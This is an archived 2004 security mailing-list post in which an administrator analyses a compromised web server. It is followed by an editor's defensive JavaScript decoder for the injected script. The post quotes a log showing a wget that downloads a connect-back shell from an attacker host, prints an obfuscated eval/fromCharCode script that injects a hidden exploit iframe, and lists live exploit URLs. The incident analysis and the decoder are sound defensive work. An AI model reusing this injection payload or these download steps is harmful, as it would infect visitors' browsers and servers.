Full Disclosure mailing list archives
xpire.info & splitinfinity.info - exploits in the wild
From: "Elia Florio" <eflorio () edmaster it>
Date: Sun, 24 Oct 2004 13:47:04 +0200
Hi list,

I'm doing some analysis on a Linux-Mandrake 9.0 web server belonging to a person who was compromised in October. A special trojan is now installed on this host that inserts a malicious <IFRAME> tag into every served .PHP page.

The host is running these services:

Port 21: 220 ProFTPD 1.2.5 Server (XXXXXXX FTP Server) [server]
Port 22: SSH-1.99-OpenSSH_3.4p1
Port 25: 220 XXXXX ESMTP 5.5.1
Port 110: +OK <XXXX@XXXXXX>
Port 3306: MySQL 3.23.52
Ports 80/443: Server: Apache-AdvancedExtranetServer/1.3.26 (Mandrake Linux/6mdk) sxnet/1.2.4 mod_ssl/2.8.10 OpenSSL/0.9.6g PHP/4.2.3

I've found in the Apache log that the hacker broke into the machine using an overflow and injected an executable /tmp/a.out via "qmail-inject". These are the suspicious log lines:

[Sun Oct 3 03:35:10 2004] [notice] child pid 16012 exit signal Segmentation fault (11)
[Sun Oct 3 04:08:34 2004] [notice] child pid 1272 exit signal Segmentation fault (11)
[Sun Oct 3 07:18:27 2004] [notice] child pid 4397 exit signal Segmentation fault (11)
[Mon Oct 4 02:27:55 2004] [notice] child pid 1203 exit signal Segmentation fault (11)
qmail-inject: fatal: unable to parse this line:From: I.T.I.S. S. CANNIZZARO" <angdimar () yahoo it>
[Mon Oct 4 18:43:02 2004] [notice] child pid 4248 exit signal Segmentation fault (11)
[Mon Oct 4 22:58:50 2004] [notice] child pid 1190 exit signal Segmentation fault (11)
[Tue Oct 5 11:58:13 2004] [notice] child pid 15689 exit signal Segmentation fault (11)
qmail-inject: fatal: unable to parse this line: To: Drugo:Lebowski () libero it
sh: -c: option requires an argument
--15:50:07-- http://xpire.info/cli.gz
=> `/tmp/a.out'
Resolving xpire.info... done.
Connecting to xpire.info[221.139.50.11]:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 19,147 [text/plain]

0K .......... ........ 100% 9.97K

15:50:13 (9.97 KB/s) - `/tmp/a.out' saved [19147/19147]

[Fri Oct 8 20:26:52 2004] [notice] child pid 9647 exit signal Segmentation fault (11)
[Sat Oct 9 01:09:51 2004] [notice] child pid 3840 exit signal Segmentation fault (11)

Trying a wget of http://xpire.info/cli.gz, I get an ELF executable for Linux, possibly containing a ConnectBack shell. Inside this ELF file you can grep these strings:

Usage: %s host port
pqrstuvwxyzabcde
0123456789abcdef
/dev/ptmx
/dev/pty
/dev/tty
sh -i
Can't fork pty, bye!
Fuck you so
/bin/sh
No connect
Looking up %s...
Failed!
OK
%u
Connect Back

I don't know if the hacker installed a rootkit on this machine, but the md5sum check of the ls, lsof, ps and netstat binaries against the ones from a clean Mandrake distribution was good.......

The main problem is finding how the Apache server (or PHP) was altered by the hacker, because every user that connects to this host now could be infected by several recent HTML/IE exploits.

Sniffing an HTTP packet from this host, I've found that *SOMETIMES* (in a random way??) the web server inserts a special javascript between the HTTP header and the served page. The script is:

<script language=javascript>
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,115,112,108,105,116,105,110,102,105,110,105,116,121,46,105,110,102,111,47,102,97,47,63,100,61,103,101,116,39,32,104,101,105,103,104,116,61,49,32,119,105,100,116,104,61,49,62,60,47,105,102,114,97,109,101,62,34,41))
</script>

Decoding it, I see that it writes an <IFRAME> tag into the page pointing to this url:

<iframe src='http://www.splitinfinity.info/fa/?d=get' height=1 width=1></iframe>

If you surf to this page (don't do this if you use IE or are not patched) you could get infected by several exploits, because it opens a lot of <iframe>s pointing to different domains.

I would like to list these domains here, because they are sources for exploit studying:

Domain: www.sp2fucked.biz
http://69.50.168.147/user28/counter.htm    Found MHTMLRedir.Exploit
http://213.159.117.133/dl/adv121.php
http://195.178.160.30/js.php?cust=28
http://195.178.160.30/ifr.php?cust=89
http://69.50.168.147/user28/exploit.htm    Found Java class exploit
http://69.50.168.147/user28/exploit2.htm

My questions are:

1) How can I remove this injected Javascript/IFRAME? I've checked httpd.conf and a lot of PHP pages, but I haven't found anything..... Is it possible that the hacker installed some compromised Apache module or so???

2) Does anyone know these sites (xpire.info or splitinfinity.info) from before? Why are they still online and serving trojans/exploits to surfers' browsers? xpire.info is related to "Mike Fox"..... but it sounds like a fake John Doe registration!

Domain ID: D5946452-LRMS
Domain Name: XPIRE.INFO
Created On: 23-May-2004 19:41:15 UTC
Last Updated On: 02-Aug-2004 08:07:20 UTC
Expiration Date: 23-May-2005 19:41:15 UTC
Sponsoring Registrar: Direct Information Pvt Ltd. d/b/a Directi.com (R159-LRMS)
Status: ACTIVE
Status: OK
Registrant ID: C4752858-LRMS
Registrant Name: Mike Fox
Registrant Organization: n/a
Registrant Street1: Hali-gali, 77
Registrant City: Deli
Registrant Postal Code: 12345
Registrant Country: IN
Registrant Phone: +91.226370256
Registrant Email: c8idkvtgarwinidkvt38 () yahoo com

3) How can I tell if a rootkit was installed???

Thanks anyone for replies

EF

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
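Editor's added example (not code from the original post or from anyone in the thread): a static decoder for the injected script quoted above. The poster decoded the payload by hand; the point here is to recover the String.fromCharCode(...) text from a captured response body without ever running eval on attacker-supplied code, to tolerate the line wrapping a mail client puts in the middle of a number (the "1 01" in the quoted script), and to report each iframe the decoded document.write() would insert, flagging 1x1 frames. The sample response bodies and the names decodeFromCharCode, extractIframes and analyzePage are constructed for this example and are assumptions, not anything observed on the compromised host.

```javascript
'use strict';

// Constructed sample for this example: a served page followed by the
// injected script the post quotes, as it sits after the HTTP headers.
const SAMPLE_PAGE = `<html><body><p>served page</p></body></html>
<script language=javascript>
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,101,40,34,60,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47,47,119,119,119,46,115,112,108,105,116,105,110,102,105,110,105,116,121,46,105,110,102,111,47,102,97,47,63,100,61,103,101,116,39,32,104,101,105,103,104,116,61,49,32,119,105,100,116,104,61,49,62,60,47,105,102,114,97,109,101,62,34,41))
</script>`;

// The same script as the mail client wrapped it in the post: line breaks
// fall in the middle of numbers ("1\n01"), so a decoder must rejoin them.
const SAMPLE_WRAPPED = `<script language=javascript>
eval(String.fromCharCode(100,111,99,117,109,101,110,116,46,119,114,105,116,1
01,40,34,60,105,102,114,97,109,101,32,115,114,99,61,39,104,116,116,112,58,47
,47,119,119,119,46,115,112,108,105,116,105,110,102,105,110,105,116,121,46,10
5,110,102,111,47,102,97,47,63,100,61,103,101,116,39,32,104,101,105,103,104,1
16,61,49,32,119,105,100,116,104,61,49,62,60,47,105,102,114,97,109,101,62,34,
41))
</script>`;

// Return the text each String.fromCharCode(...) call in `source` would
// produce. No eval: the numeric list is parsed and mapped back to
// characters, so the attacker's script is never executed.
function decodeFromCharCode(source) {
  const call = /String\.fromCharCode\s*\(([\d\s,]+)\)/g;
  const decoded = [];
  let m;
  while ((m = call.exec(source)) !== null) {
    const codes = m[1]
      .replace(/\s+/g, '')            // rejoin numbers split by line wrapping
      .split(',')
      .filter((s) => s.length > 0)
      .map(Number);
    decoded.push(String.fromCharCode(...codes));
  }
  return decoded;
}

// List the <iframe> tags in a decoded payload with their src and whether
// the frame is sized to be invisible (height and width both <= 1), which
// is the shape a drive-by exploit kit loader takes.
function extractIframes(payload) {
  const tag = /<iframe\b([^>]*)>/gi;
  const frames = [];
  let m;
  while ((m = tag.exec(payload)) !== null) {
    const attrs = m[1];
    const src = /\bsrc\s*=\s*['"]?([^'"\s>]+)/i.exec(attrs);
    const h = /\bheight\s*=\s*['"]?(\d+)/i.exec(attrs);
    const w = /\bwidth\s*=\s*['"]?(\d+)/i.exec(attrs);
    frames.push({
      src: src ? src[1] : null,
      hidden: Boolean(h && w && Number(h[1]) <= 1 && Number(w[1]) <= 1),
    });
  }
  return frames;
}

// Run both steps over a captured response body and return one finding per
// iframe: the decoded script plus the frame's src and hidden flag.
function analyzePage(html) {
  const findings = [];
  for (const payload of decodeFromCharCode(html)) {
    for (const frame of extractIframes(payload)) {
      findings.push({ payload, ...frame });
    }
  }
  return findings;
}

for (const f of analyzePage(SAMPLE_PAGE)) {
  console.log(`${f.hidden ? 'HIDDEN ' : ''}iframe -> ${f.src}`);
  console.log(`  decoded: ${f.payload}`);
}
```

Feed analyzePage the body of a response captured off the wire (as the poster did with a sniffer), not a file from the server's document root: the post notes the insertion happens only sometimes and was not visible in httpd.conf or the PHP sources, so only the served output is trustworthy evidence. This decoder only understands the fromCharCode encoder used in this one script; other encoders (unescape, custom XOR loops) need their own handling.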
Current thread:
- xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Kevin (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Nick FitzGerald (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Ron DuFresne (Oct 25)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 26)
- Re: [SPAM] Re: xpire.info & splitinfinity.info - exploits in the wild Hugo van der Kooij (Oct 26)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 26)
- <Possible follow-ups>
- Re: xpire.info & splitinfinity.info - exploits in the wild bowwow (Oct 24)
- Re: xpire.info & splitinfinity.info - exploits in the wild Elia Florio (Oct 27)
- Re: [SPAM] Re: xpire.info & splitinfinity.info - exploits in the wild Hugo van der Kooij (Oct 27)
- Re: xpire.info & splitinfinity.info - exploits in the wild Kevin (Oct 24)